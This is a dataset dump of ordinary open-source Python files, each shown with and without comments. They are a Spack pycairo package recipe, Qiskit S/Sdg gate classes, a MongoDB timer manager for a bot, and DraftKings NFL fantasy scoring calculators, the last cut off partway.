fout.write("epoch:{} steps:{} evaluation res:{}\n".format(epoch,train_steps,json.dumps(out_eval, sort_keys=True, indent=2)))
import logging
logger = logging.getLogger(__name__)
logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt='%m/%d/%Y %H:%M:%S',
level=logging.INFO )
logger.info("write evaluation result to " + out_file + "OK!")
else:
print(json.dumps(out_eval, indent=2))
return out_eval
if __name__ == '__main__':
OPTS = parse_args()
if OPTS.out_image_dir:
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
print(vars(OPTS))
main()
| true
| true
|
f707c66759e748052baf1d1b8d95b91737e37c5f
| 1,421
|
py
|
Python
|
var/spack/repos/builtin/packages/py-pycairo/package.py
|
LiamBindle/spack
|
e90d5ad6cfff2ba3de7b537d6511adccd9d5fcf1
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 2,360
|
2017-11-06T08:47:01.000Z
|
2022-03-31T14:45:33.000Z
|
var/spack/repos/builtin/packages/py-pycairo/package.py
|
LiamBindle/spack
|
e90d5ad6cfff2ba3de7b537d6511adccd9d5fcf1
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 13,838
|
2017-11-04T07:49:45.000Z
|
2022-03-31T23:38:39.000Z
|
var/spack/repos/builtin/packages/py-pycairo/package.py
|
LiamBindle/spack
|
e90d5ad6cfff2ba3de7b537d6511adccd9d5fcf1
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 1,793
|
2017-11-04T07:45:50.000Z
|
2022-03-30T14:31:53.000Z
|
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import os
from spack import *
class PyPycairo(PythonPackage):
"""Pycairo is a set of Python bindings for the cairo graphics library."""
homepage = "https://www.cairographics.org/pycairo/"
pypi = "pycairo/pycairo-1.17.1.tar.gz"
version('1.20.0', sha256='5695a10cb7f9ae0d01f665b56602a845b0a8cb17e2123bfece10c2e58552468c')
version('1.18.1', sha256='70172e58b6bad7572a3518c26729b074acdde15e6fee6cbab6d3528ad552b786')
version('1.17.1', sha256='0f0a35ec923d87bc495f6753b1e540fd046d95db56a35250c44089fbce03b698')
depends_on('cairo@1.15.10: +pdf', when='@1.20.0:')
depends_on('cairo@1.13.1: +pdf', when='@:1.18.1')
depends_on('pkgconfig', type='build')
depends_on('py-setuptools', type='build')
depends_on('python@2.7:2.8,3.3:', when='@:1.17.1', type=('build', 'run'))
depends_on('python@2.7:2.8,3.4:3.7', when='@1.18.1:1.19', type=('build', 'run'))
depends_on('python@3.6:3', when='@1.20.0:', type=('build', 'run'))
@run_after('install')
def post_install(self):
src = self.prefix.lib + '/pkgconfig/py3cairo.pc'
dst = self.prefix.lib + '/pkgconfig/pycairo.pc'
if os.path.exists(src) and not os.path.exists(dst):
copy(src, dst)
| 40.6
| 96
| 0.68121
|
import os
from spack import *
class PyPycairo(PythonPackage):
homepage = "https://www.cairographics.org/pycairo/"
pypi = "pycairo/pycairo-1.17.1.tar.gz"
version('1.20.0', sha256='5695a10cb7f9ae0d01f665b56602a845b0a8cb17e2123bfece10c2e58552468c')
version('1.18.1', sha256='70172e58b6bad7572a3518c26729b074acdde15e6fee6cbab6d3528ad552b786')
version('1.17.1', sha256='0f0a35ec923d87bc495f6753b1e540fd046d95db56a35250c44089fbce03b698')
depends_on('cairo@1.15.10: +pdf', when='@1.20.0:')
depends_on('cairo@1.13.1: +pdf', when='@:1.18.1')
depends_on('pkgconfig', type='build')
depends_on('py-setuptools', type='build')
depends_on('python@2.7:2.8,3.3:', when='@:1.17.1', type=('build', 'run'))
depends_on('python@2.7:2.8,3.4:3.7', when='@1.18.1:1.19', type=('build', 'run'))
depends_on('python@3.6:3', when='@1.20.0:', type=('build', 'run'))
@run_after('install')
def post_install(self):
src = self.prefix.lib + '/pkgconfig/py3cairo.pc'
dst = self.prefix.lib + '/pkgconfig/pycairo.pc'
if os.path.exists(src) and not os.path.exists(dst):
copy(src, dst)
| true
| true
|
f707c6739dae4cd8d9569f54bb93dba89cc51996
| 3,303
|
py
|
Python
|
qiskit/circuit/library/standard_gates/s.py
|
yeralin/qiskit-terra
|
251930a7b5d83af121ea0f3aafb33a54a1860e14
|
[
"Apache-2.0"
] | 1
|
2020-10-25T17:56:57.000Z
|
2020-10-25T17:56:57.000Z
|
qiskit/circuit/library/standard_gates/s.py
|
yeralin/qiskit-terra
|
251930a7b5d83af121ea0f3aafb33a54a1860e14
|
[
"Apache-2.0"
] | null | null | null |
qiskit/circuit/library/standard_gates/s.py
|
yeralin/qiskit-terra
|
251930a7b5d83af121ea0f3aafb33a54a1860e14
|
[
"Apache-2.0"
] | null | null | null |
# This code is part of Qiskit.
#
# (C) Copyright IBM 2017.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""The S and Sdg gate."""
import numpy
from qiskit.qasm import pi
from qiskit.circuit.gate import Gate
from qiskit.circuit.quantumregister import QuantumRegister
class SGate(Gate):
r"""Single qubit S gate (Z**0.5).
It induces a :math:`\pi/2` phase, and is sometimes called the P gate (phase).
This is a Clifford gate and a square-root of Pauli-Z.
**Matrix Representation:**
.. math::
S = \begin{pmatrix}
1 & 0 \\
0 & i
\end{pmatrix}
**Circuit symbol:**
.. parsed-literal::
┌───┐
q_0: ┤ S ├
└───┘
Equivalent to a :math:`\pi/2` radian rotation about the Z axis.
"""
def __init__(self, label=None):
"""Create new S gate."""
super().__init__('s', 1, [], label=label)
def _define(self):
"""
gate s a { u1(pi/2) a; }
"""
# pylint: disable=cyclic-import
from qiskit.circuit.quantumcircuit import QuantumCircuit
from .u1 import U1Gate
q = QuantumRegister(1, 'q')
qc = QuantumCircuit(q, name=self.name)
rules = [
(U1Gate(pi / 2), [q[0]], [])
]
qc._data = rules
self.definition = qc
def inverse(self):
"""Return inverse of S (SdgGate)."""
return SdgGate()
def to_matrix(self):
"""Return a numpy.array for the S gate."""
return numpy.array([[1, 0],
[0, 1j]], dtype=complex)
class SdgGate(Gate):
r"""Single qubit S-adjoint gate (~Z**0.5).
It induces a :math:`-\pi/2` phase.
This is a Clifford gate and a square-root of Pauli-Z.
**Matrix Representation:**
.. math::
Sdg = \begin{pmatrix}
1 & 0 \\
0 & -i
\end{pmatrix}
**Circuit symbol:**
.. parsed-literal::
┌─────┐
q_0: ┤ Sdg ├
└─────┘
Equivalent to a :math:`\pi/2` radian rotation about the Z axis.
"""
def __init__(self, label=None):
"""Create new Sdg gate."""
super().__init__('sdg', 1, [], label=label)
def _define(self):
"""
gate sdg a { u1(-pi/2) a; }
"""
# pylint: disable=cyclic-import
from qiskit.circuit.quantumcircuit import QuantumCircuit
from .u1 import U1Gate
q = QuantumRegister(1, 'q')
qc = QuantumCircuit(q, name=self.name)
rules = [
(U1Gate(-pi / 2), [q[0]], [])
]
qc._data = rules
self.definition = qc
def inverse(self):
"""Return inverse of Sdg (SGate)."""
return SGate()
def to_matrix(self):
"""Return a numpy.array for the Sdg gate."""
return numpy.array([[1, 0],
[0, -1j]], dtype=complex)
| 25.21374
| 81
| 0.544051
|
import numpy
from qiskit.qasm import pi
from qiskit.circuit.gate import Gate
from qiskit.circuit.quantumregister import QuantumRegister
class SGate(Gate):
def __init__(self, label=None):
super().__init__('s', 1, [], label=label)
def _define(self):
from qiskit.circuit.quantumcircuit import QuantumCircuit
from .u1 import U1Gate
q = QuantumRegister(1, 'q')
qc = QuantumCircuit(q, name=self.name)
rules = [
(U1Gate(pi / 2), [q[0]], [])
]
qc._data = rules
self.definition = qc
def inverse(self):
return SdgGate()
def to_matrix(self):
return numpy.array([[1, 0],
[0, 1j]], dtype=complex)
class SdgGate(Gate):
def __init__(self, label=None):
super().__init__('sdg', 1, [], label=label)
def _define(self):
from qiskit.circuit.quantumcircuit import QuantumCircuit
from .u1 import U1Gate
q = QuantumRegister(1, 'q')
qc = QuantumCircuit(q, name=self.name)
rules = [
(U1Gate(-pi / 2), [q[0]], [])
]
qc._data = rules
self.definition = qc
def inverse(self):
return SGate()
def to_matrix(self):
return numpy.array([[1, 0],
[0, -1j]], dtype=complex)
| true
| true
|
f707c6d480737417d70c708d14c32c7ba550b80b
| 6,151
|
py
|
Python
|
mongodb/factory/timer.py
|
RaenonX/Jelly-Bot-API
|
c7da1e91783dce3a2b71b955b3a22b68db9056cf
|
[
"MIT"
] | 5
|
2020-08-26T20:12:00.000Z
|
2020-12-11T16:39:22.000Z
|
mongodb/factory/timer.py
|
RaenonX/Jelly-Bot
|
c7da1e91783dce3a2b71b955b3a22b68db9056cf
|
[
"MIT"
] | 234
|
2019-12-14T03:45:19.000Z
|
2020-08-26T18:55:19.000Z
|
mongodb/factory/timer.py
|
RaenonX/Jelly-Bot-API
|
c7da1e91783dce3a2b71b955b3a22b68db9056cf
|
[
"MIT"
] | 2
|
2019-10-23T15:21:15.000Z
|
2020-05-22T09:35:55.000Z
|
"""Data manager for the timers."""
from datetime import datetime, timedelta
from typing import Optional, List
import pymongo
from bson import ObjectId
from models import TimerModel, TimerListResult, OID_KEY
from mongodb.factory.results import WriteOutcome
from extutils.checker import arg_type_ensure
from extutils.locales import UTC
from extutils.dt import is_tz_naive, now_utc_aware, make_tz_aware
from JellyBot.systemconfig import Bot
from ._base import BaseCollection
__all__ = ("TimerManager",)
DB_NAME = "timer"
class _TimerManager(BaseCollection):
database_name = DB_NAME
collection_name = "timer"
model_class = TimerModel
def build_indexes(self):
self.create_index(TimerModel.Keyword.key)
self.create_index(TimerModel.DeletionTime.key, expireAfterSeconds=0)
@arg_type_ensure
def add_new_timer(
self, ch_oid: ObjectId, keyword: str, title: str, target_time: datetime, *,
countup: bool = False, period_sec: int = 0) -> WriteOutcome:
"""`target_time` is recommended to be tz-aware. Tzinfo will be forced to be UTC if tz-naive."""
# Force target time to be tz-aware in UTC
if is_tz_naive(target_time):
target_time = make_tz_aware(target_time, UTC.to_tzinfo())
mdl = TimerModel(
ChannelOid=ch_oid, Keyword=keyword, Title=title, TargetTime=target_time,
Countup=countup, PeriodSeconds=period_sec)
if not countup:
mdl.deletion_time = target_time + timedelta(days=Bot.Timer.AutoDeletionDays)
mdl.deletion_time = make_tz_aware(mdl.deletion_time, target_time.tzinfo)
outcome, _ = self.insert_one_model(mdl)
return outcome
@arg_type_ensure
def del_timer(self, timer_oid: ObjectId) -> bool:
"""
Delete the timer by its OID.
:param timer_oid: OID of the timer to be deleted
:return: if the timer was successfully deleted
"""
return self.delete_one({OID_KEY: timer_oid}).deleted_count > 0
@arg_type_ensure
def list_all_timer(self, channel_oid: ObjectId) -> TimerListResult:
"""
List all the timers in the channel ``channel_oid``.
All timers in the returned result will be sorted by its target time (ASC).
:param channel_oid: channel of the timers
:return: a `TimerListResult` containing the timers that match the conditions
"""
return TimerListResult(
self.find_cursor_with_count(
{TimerModel.ChannelOid.key: channel_oid},
sort=[(TimerModel.TargetTime.key, pymongo.ASCENDING)]
)
)
@arg_type_ensure
def get_timers(self, channel_oid: ObjectId, keyword: str) -> TimerListResult:
"""
Get the timers in the channel ``channel_oid`` which keyword ``keyword``.
``keyword`` needs to be an exact match, **NOT** partial match.
All timers in the returned result will be sorted by its target time (ASC).
:param channel_oid: channel of the timers
:param keyword: keyword of the timers
:return: a `TimerListResult` containing the timers that match the conditions
"""
return TimerListResult(
self.find_cursor_with_count(
{TimerModel.Keyword.key: keyword, TimerModel.ChannelOid.key: channel_oid},
sort=[(TimerModel.TargetTime.key, pymongo.ASCENDING)]
)
)
@arg_type_ensure
def get_notify(self, channel_oid: ObjectId, within_secs: Optional[int] = None) -> List[TimerModel]:
"""
Get a list of unnotified timers which will timeup in ``within_secs`` seconds in ``channel_oid``.
Returned timers will be sorted by its target time (ASC).
:param channel_oid: channel of the timers
:param within_secs: timers that will timeup within this amount of seconds will be returned
:return: a list of timers that is not yet notified and will timeup in `within_secs` seconds
"""
now = now_utc_aware()
filter_ = {
TimerModel.ChannelOid.key: channel_oid,
TimerModel.TargetTime.key: {
"$lt": now + timedelta(seconds=within_secs if within_secs else Bot.Timer.MaxNotifyRangeSeconds),
"$gt": now
},
TimerModel.Notified.key: False
}
ret = list(self.find_cursor_with_count(filter_, sort=[(TimerModel.TargetTime.key, pymongo.ASCENDING)]))
self.update_many_async(filter_, {"$set": {TimerModel.Notified.key: True}})
return ret
@arg_type_ensure
def get_time_up(self, channel_oid: ObjectId) -> List[TimerModel]:
"""
Get a list of unnotified timers which timed up in ``channel_oid``.
All timers in the returned result will be sorted by its target time (ASC).
:param channel_oid: channel of the timers
:return: a list of timers that is not yet notified and already timed up
"""
now = now_utc_aware()
filter_ = {
TimerModel.ChannelOid.key: channel_oid,
TimerModel.TargetTime.key: {"$lt": now},
TimerModel.NotifiedExpired.key: False
}
ret = list(self.find_cursor_with_count(filter_, sort=[(TimerModel.TargetTime.key, pymongo.ASCENDING)]))
self.update_many_async(filter_, {"$set": {TimerModel.NotifiedExpired.key: True}})
return ret
@staticmethod
def get_notify_within_secs(message_frequency: float):
"""
Get a time range calculated by ``message_frequency`` which can be used to get the timers for notification.
Calculate formula: **message frequency x 20 + 600**
If the calculated result is greater than ``Bot.Timer.MaxNotifyRangeSeconds``,
then ``Bot.Timer.MaxNotifyRangeSeconds`` will be returned instead.
:param message_frequency: message frequency in seconds per message
:return: time range to be used to get the timers for notification
"""
return min(message_frequency * 20 + 600, Bot.Timer.MaxNotifyRangeSeconds)
TimerManager = _TimerManager()
| 36.613095
| 114
| 0.664282
|
from datetime import datetime, timedelta
from typing import Optional, List
import pymongo
from bson import ObjectId
from models import TimerModel, TimerListResult, OID_KEY
from mongodb.factory.results import WriteOutcome
from extutils.checker import arg_type_ensure
from extutils.locales import UTC
from extutils.dt import is_tz_naive, now_utc_aware, make_tz_aware
from JellyBot.systemconfig import Bot
from ._base import BaseCollection
__all__ = ("TimerManager",)
DB_NAME = "timer"
class _TimerManager(BaseCollection):
database_name = DB_NAME
collection_name = "timer"
model_class = TimerModel
def build_indexes(self):
self.create_index(TimerModel.Keyword.key)
self.create_index(TimerModel.DeletionTime.key, expireAfterSeconds=0)
@arg_type_ensure
def add_new_timer(
self, ch_oid: ObjectId, keyword: str, title: str, target_time: datetime, *,
countup: bool = False, period_sec: int = 0) -> WriteOutcome:
if is_tz_naive(target_time):
target_time = make_tz_aware(target_time, UTC.to_tzinfo())
mdl = TimerModel(
ChannelOid=ch_oid, Keyword=keyword, Title=title, TargetTime=target_time,
Countup=countup, PeriodSeconds=period_sec)
if not countup:
mdl.deletion_time = target_time + timedelta(days=Bot.Timer.AutoDeletionDays)
mdl.deletion_time = make_tz_aware(mdl.deletion_time, target_time.tzinfo)
outcome, _ = self.insert_one_model(mdl)
return outcome
@arg_type_ensure
def del_timer(self, timer_oid: ObjectId) -> bool:
return self.delete_one({OID_KEY: timer_oid}).deleted_count > 0
@arg_type_ensure
def list_all_timer(self, channel_oid: ObjectId) -> TimerListResult:
return TimerListResult(
self.find_cursor_with_count(
{TimerModel.ChannelOid.key: channel_oid},
sort=[(TimerModel.TargetTime.key, pymongo.ASCENDING)]
)
)
@arg_type_ensure
def get_timers(self, channel_oid: ObjectId, keyword: str) -> TimerListResult:
return TimerListResult(
self.find_cursor_with_count(
{TimerModel.Keyword.key: keyword, TimerModel.ChannelOid.key: channel_oid},
sort=[(TimerModel.TargetTime.key, pymongo.ASCENDING)]
)
)
@arg_type_ensure
def get_notify(self, channel_oid: ObjectId, within_secs: Optional[int] = None) -> List[TimerModel]:
now = now_utc_aware()
filter_ = {
TimerModel.ChannelOid.key: channel_oid,
TimerModel.TargetTime.key: {
"$lt": now + timedelta(seconds=within_secs if within_secs else Bot.Timer.MaxNotifyRangeSeconds),
"$gt": now
},
TimerModel.Notified.key: False
}
ret = list(self.find_cursor_with_count(filter_, sort=[(TimerModel.TargetTime.key, pymongo.ASCENDING)]))
self.update_many_async(filter_, {"$set": {TimerModel.Notified.key: True}})
return ret
@arg_type_ensure
def get_time_up(self, channel_oid: ObjectId) -> List[TimerModel]:
now = now_utc_aware()
filter_ = {
TimerModel.ChannelOid.key: channel_oid,
TimerModel.TargetTime.key: {"$lt": now},
TimerModel.NotifiedExpired.key: False
}
ret = list(self.find_cursor_with_count(filter_, sort=[(TimerModel.TargetTime.key, pymongo.ASCENDING)]))
self.update_many_async(filter_, {"$set": {TimerModel.NotifiedExpired.key: True}})
return ret
@staticmethod
def get_notify_within_secs(message_frequency: float):
return min(message_frequency * 20 + 600, Bot.Timer.MaxNotifyRangeSeconds)
TimerManager = _TimerManager()
| true
| true
|
f707c9b9127d02117714037a1a1e058f1ab6331e
| 7,900
|
py
|
Python
|
daily_fantasy_sports_scoring_calculators/draft_kings/nfl/scoring/calculators/statistical_value_to_points/offensive.py
|
jaebradley/daily_fantasy_sports_scoring_calculators
|
99b7e0443637cb4405ccdad7fa4f136af914307b
|
[
"MIT"
] | null | null | null |
daily_fantasy_sports_scoring_calculators/draft_kings/nfl/scoring/calculators/statistical_value_to_points/offensive.py
|
jaebradley/daily_fantasy_sports_scoring_calculators
|
99b7e0443637cb4405ccdad7fa4f136af914307b
|
[
"MIT"
] | 3
|
2021-09-05T01:40:16.000Z
|
2021-09-20T06:53:54.000Z
|
daily_fantasy_sports_scoring_calculators/draft_kings/nfl/scoring/calculators/statistical_value_to_points/offensive.py
|
jaebradley/daily_fantasy_sports_scoring_calculators
|
99b7e0443637cb4405ccdad7fa4f136af914307b
|
[
"MIT"
] | null | null | null |
from daily_fantasy_sports_scoring_calculators.core.calculators.scoring import StatisticalCategoryPointsCalculator, \
StatisticalValueCalculator
from daily_fantasy_sports_scoring_calculators.draft_kings.nfl.scoring.calculators.value_to_points.offensive import \
PassingTouchdownsCalculator as PassingTouchdownsPointsCalculator, \
HasAchievedAtLeast300YardsCalculator as HasAchievedAtLeast300PassingYardsPointsCalculator, \
PassingYardageCalculator as PassingYardagePointsCalculator, \
HasAchievedAtLeast100YardsCalculator as HasAchievedAtLeast100YardsPointsCalculator, \
NonPassingTouchdownsCalculator as NonPassingTouchdownsPointsCalculator, \
NonPassingYardsCalculator as NonPassingYardsPointsCalculator, \
TurnoversCalculator as TurnoversPointsCalculator, \
TwoPointConversionsCalculator as TwoPointConversionsPointsCalculator, \
ReceptionsCalculator as ReceptionsPointsCalculator
from daily_fantasy_sports_scoring_calculators.draft_kings.nfl.statistics.calculators.offensive import \
PassingTouchdownsCalculator as PassingTouchdownsValueCalculator, \
HasAchievedMinimumYardageRequirementCalculator as HasAchievedMinimumYardageRequirementValueCalculator, \
InterceptionsCalculator as InterceptionsValueCalculator, \
RushingTouchdownsCalculator as RushingTouchdownsValueCalculator, \
RushingYardageCalculator as RushingYardageValueCalculator, \
ReceivingTouchdownsCalculator as ReceivingTouchdownsValueCalculator, \
ReceptionsCalculator as ReceptionsValueCalculator, \
KickoffsReturnTouchdownsCalculator as KickoffsReturnTouchdownsValueCalculator, \
PuntReturnTouchdownsCalculator as PuntReturnTouchdownsValueCalculator, \
FieldGoalReturnTouchdownsCalculator as FieldGoalReturnTouchdownsValueCalculator, \
FumblesLostCalculator as FumblesLostValueCalculator, \
TwoPointConversionsCaughtCalculator as TwoPointConversionsCaughtValueCalculator, \
TwoPointConversionsRushedCalculator as TwoPointConversionsRushedValueCalculator, \
TwoPointConversionsThrownCalculator as TwoPointConversionsThrownValueCalculator, \
FumbleRecoveryTouchdownsCalculator as FumbleRecoveryTouchdownsValueCalculator, \
ReceivingYardageCalculator as ReceivingYardageValueCalculator, \
PassingYardageCalculator as PassingYardageValueCalculator
passing_yardage_value_calculator = PassingYardageValueCalculator()
receiving_yardage_value_calculator = ReceivingYardageValueCalculator()
rushing_yardage_value_calculator = RushingYardageValueCalculator()
non_passing_yards_points_calculator = NonPassingYardsPointsCalculator()
class PassingTouchdownsCalculator(StatisticalCategoryPointsCalculator):
def __init__(self):
super().__init__(
PassingTouchdownsValueCalculator(),
PassingTouchdownsPointsCalculator())
class NonPassingTouchdownsCalculator(StatisticalCategoryPointsCalculator):
def __init__(self, value_calculator: StatisticalValueCalculator):
super().__init__(value_calculator, NonPassingTouchdownsPointsCalculator())
class HasAchievedAtLeast300PassingYardsCalculator(StatisticalCategoryPointsCalculator):
def __init__(self):
super().__init__(
HasAchievedMinimumYardageRequirementValueCalculator(
yardage_value_calculator=passing_yardage_value_calculator,
minimum_inclusive_required_yardage=300
),
HasAchievedAtLeast300PassingYardsPointsCalculator()
)
class PassingYardageCalculator(StatisticalCategoryPointsCalculator):
def __init__(self):
super().__init__(
passing_yardage_value_calculator,
PassingYardagePointsCalculator())
class TurnoversCalculator(StatisticalCategoryPointsCalculator):
def __init__(self, value_calculator: StatisticalValueCalculator):
super().__init__(value_calculator, TurnoversPointsCalculator())
def __eq__(self, o: object) -> bool:
if isinstance(o, TurnoversCalculator):
return o.value_calculator == self.value_calculator and super().__eq__(o)
return False
def __hash__(self):
return hash((self.value_calculator, super().__hash__()))
class InterceptionsCalculator(TurnoversCalculator):
def __init__(self):
super().__init__(InterceptionsValueCalculator())
class RushingTouchdownsCalculator(NonPassingTouchdownsCalculator):
def __init__(self):
super().__init__(RushingTouchdownsValueCalculator())
class RushingYardageCalculator(StatisticalCategoryPointsCalculator):
def __init__(self):
super().__init__(
rushing_yardage_value_calculator,
non_passing_yards_points_calculator)
class HasReached100YardsRushingPointsLimit(
StatisticalCategoryPointsCalculator):
def __init__(self):
super().__init__(
HasAchievedMinimumYardageRequirementValueCalculator(
yardage_value_calculator=rushing_yardage_value_calculator,
minimum_inclusive_required_yardage=100
),
HasAchievedAtLeast100YardsPointsCalculator()
)
class ReceivingTouchdownsCalculator(NonPassingTouchdownsCalculator):
def __init__(self):
super().__init__(ReceivingTouchdownsValueCalculator())
class ReceivingYardsCalculator(StatisticalCategoryPointsCalculator):
def __init__(self):
super().__init__(
receiving_yardage_value_calculator,
non_passing_yards_points_calculator)
class HasReached100YardsReceivingCalculator(StatisticalCategoryPointsCalculator):
def __init__(self):
super().__init__(
value_calculator=HasAchievedMinimumYardageRequirementValueCalculator(
yardage_value_calculator=receiving_yardage_value_calculator,
minimum_inclusive_required_yardage=100),
points_calculator=HasAchievedAtLeast100YardsPointsCalculator())
class ReceptionsCalculator(StatisticalCategoryPointsCalculator):
def __init__(self):
super().__init__(ReceptionsValueCalculator(), ReceptionsPointsCalculator())
class PuntReturnTouchdownsCalculator(NonPassingTouchdownsCalculator):
def __init__(self):
super().__init__(PuntReturnTouchdownsValueCalculator())
class KickReturnTouchdownsCalculator(NonPassingTouchdownsCalculator):
def __init__(self):
super().__init__(KickoffsReturnTouchdownsValueCalculator())
class FieldGoalReturnTouchdownsCalculator(NonPassingTouchdownsCalculator):
def __init__(self):
super().__init__(FieldGoalReturnTouchdownsValueCalculator())
class FumblesLostCalculator(TurnoversCalculator):
def __init__(self):
super().__init__(FumblesLostValueCalculator())
class TwoPointConversionCalculator(StatisticalCategoryPointsCalculator):
def __init__(self, value_calculator: StatisticalValueCalculator):
super().__init__(value_calculator, TwoPointConversionsPointsCalculator())
def __eq__(self, o: object) -> bool:
if isinstance(o, TwoPointConversionCalculator):
return o.value_calculator == self.value_calculator and super().__eq__(o)
return False
def __hash__(self):
return hash((self.value_calculator, super().__hash__()))
class TwoPointConversionsThrownCalculator(TwoPointConversionCalculator):
def __init__(self):
super().__init__(TwoPointConversionsThrownValueCalculator())
class TwoPointConversionsCaughtCalculator(TwoPointConversionCalculator):
def __init__(self):
super().__init__(TwoPointConversionsCaughtValueCalculator())
class TwoPointConversionsRushedCalculator(TwoPointConversionCalculator):
def __init__(self):
super().__init__(TwoPointConversionsRushedValueCalculator())
class FumbleRecoveryTouchdownsCalculator(NonPassingTouchdownsCalculator):
def __init__(self):
super().__init__(FumbleRecoveryTouchdownsValueCalculator())
| 41.578947
| 116
| 0.797089
|
from daily_fantasy_sports_scoring_calculators.core.calculators.scoring import StatisticalCategoryPointsCalculator, \
StatisticalValueCalculator
from daily_fantasy_sports_scoring_calculators.draft_kings.nfl.scoring.calculators.value_to_points.offensive import \
PassingTouchdownsCalculator as PassingTouchdownsPointsCalculator, \
HasAchievedAtLeast300YardsCalculator as HasAchievedAtLeast300PassingYardsPointsCalculator, \
PassingYardageCalculator as PassingYardagePointsCalculator, \
HasAchievedAtLeast100YardsCalculator as HasAchievedAtLeast100YardsPointsCalculator, \
NonPassingTouchdownsCalculator as NonPassingTouchdownsPointsCalculator, \
NonPassingYardsCalculator as NonPassingYardsPointsCalculator, \
TurnoversCalculator as TurnoversPointsCalculator, \
TwoPointConversionsCalculator as TwoPointConversionsPointsCalculator, \
ReceptionsCalculator as ReceptionsPointsCalculator
from daily_fantasy_sports_scoring_calculators.draft_kings.nfl.statistics.calculators.offensive import \
PassingTouchdownsCalculator as PassingTouchdownsValueCalculator, \
HasAchievedMinimumYardageRequirementCalculator as HasAchievedMinimumYardageRequirementValueCalculator, \
InterceptionsCalculator as InterceptionsValueCalculator, \
RushingTouchdownsCalculator as RushingTouchdownsValueCalculator, \
RushingYardageCalculator as RushingYardageValueCalculator, \
ReceivingTouchdownsCalculator as ReceivingTouchdownsValueCalculator, \
ReceptionsCalculator as ReceptionsValueCalculator, \
KickoffsReturnTouchdownsCalculator as KickoffsReturnTouchdownsValueCalculator, \
PuntReturnTouchdownsCalculator as PuntReturnTouchdownsValueCalculator, \
FieldGoalReturnTouchdownsCalculator as FieldGoalReturnTouchdownsValueCalculator, \
FumblesLostCalculator as FumblesLostValueCalculator, \
TwoPointConversionsCaughtCalculator as TwoPointConversionsCaughtValueCalculator, \
TwoPointConversionsRushedCalculator as TwoPointConversionsRushedValueCalculator, \
TwoPointConversionsThrownCalculator as TwoPointConversionsThrownValueCalculator, \
FumbleRecoveryTouchdownsCalculator as FumbleRecoveryTouchdownsValueCalculator, \
ReceivingYardageCalculator as ReceivingYardageValueCalculator, \
PassingYardageCalculator as PassingYardageValueCalculator
passing_yardage_value_calculator = PassingYardageValueCalculator()
receiving_yardage_value_calculator = ReceivingYardageValueCalculator()
rushing_yardage_value_calculator = RushingYardageValueCalculator()
non_passing_yards_points_calculator = NonPassingYardsPointsCalculator()
class PassingTouchdownsCalculator(StatisticalCategoryPointsCalculator):
def __init__(self):
super().__init__(
PassingTouchdownsValueCalculator(),
PassingTouchdownsPointsCalculator())
class NonPassingTouchdownsCalculator(StatisticalCategoryPointsCalculator):
def __init__(self, value_calculator: StatisticalValueCalculator):
super().__init__(value_calculator, NonPassingTouchdownsPointsCalculator())
class HasAchievedAtLeast300PassingYardsCalculator(StatisticalCategoryPointsCalculator):
def __init__(self):
super().__init__(
HasAchievedMinimumYardageRequirementValueCalculator(
yardage_value_calculator=passing_yardage_value_calculator,
minimum_inclusive_required_yardage=300
),
HasAchievedAtLeast300PassingYardsPointsCalculator()
)
class PassingYardageCalculator(StatisticalCategoryPointsCalculator):
def __init__(self):
super().__init__(
passing_yardage_value_calculator,
PassingYardagePointsCalculator())
class TurnoversCalculator(StatisticalCategoryPointsCalculator):
def __init__(self, value_calculator: StatisticalValueCalculator):
super().__init__(value_calculator, TurnoversPointsCalculator())
def __eq__(self, o: object) -> bool:
if isinstance(o, TurnoversCalculator):
return o.value_calculator == self.value_calculator and super().__eq__(o)
return False
def __hash__(self):
return hash((self.value_calculator, super().__hash__()))
class InterceptionsCalculator(TurnoversCalculator):
def __init__(self):
super().__init__(InterceptionsValueCalculator())
class RushingTouchdownsCalculator(NonPassingTouchdownsCalculator):
def __init__(self):
super().__init__(RushingTouchdownsValueCalculator())
class RushingYardageCalculator(StatisticalCategoryPointsCalculator):
def __init__(self):
super().__init__(
rushing_yardage_value_calculator,
non_passing_yards_points_calculator)
class HasReached100YardsRushingPointsLimit(
StatisticalCategoryPointsCalculator):
def __init__(self):
super().__init__(
HasAchievedMinimumYardageRequirementValueCalculator(
yardage_value_calculator=rushing_yardage_value_calculator,
minimum_inclusive_required_yardage=100
),
HasAchievedAtLeast100YardsPointsCalculator()
)
class ReceivingTouchdownsCalculator(NonPassingTouchdownsCalculator):
def __init__(self):
super().__init__(ReceivingTouchdownsValueCalculator())
class ReceivingYardsCalculator(StatisticalCategoryPointsCalculator):
def __init__(self):
super().__init__(
receiving_yardage_value_calculator,
non_passing_yards_points_calculator)
class HasReached100YardsReceivingCalculator(StatisticalCategoryPointsCalculator):
def __init__(self):
super().__init__(
value_calculator=HasAchievedMinimumYardageRequirementValueCalculator(
yardage_value_calculator=receiving_yardage_value_calculator,
minimum_inclusive_required_yardage=100),
points_calculator=HasAchievedAtLeast100YardsPointsCalculator())
class ReceptionsCalculator(StatisticalCategoryPointsCalculator):
def __init__(self):
super().__init__(ReceptionsValueCalculator(), ReceptionsPointsCalculator())
class PuntReturnTouchdownsCalculator(NonPassingTouchdownsCalculator):
def __init__(self):
super().__init__(PuntReturnTouchdownsValueCalculator())
class KickReturnTouchdownsCalculator(NonPassingTouchdownsCalculator):
def __init__(self):
super().__init__(KickoffsReturnTouchdownsValueCalculator())
class FieldGoalReturnTouchdownsCalculator(NonPassingTouchdownsCalculator):
def __init__(self):
super().__init__(FieldGoalReturnTouchdownsValueCalculator())
class FumblesLostCalculator(TurnoversCalculator):
def __init__(self):
super().__init__(FumblesLostValueCalculator())
class TwoPointConversionCalculator(StatisticalCategoryPointsCalculator):
def __init__(self, value_calculator: StatisticalValueCalculator):
super().__init__(value_calculator, TwoPointConversionsPointsCalculator())
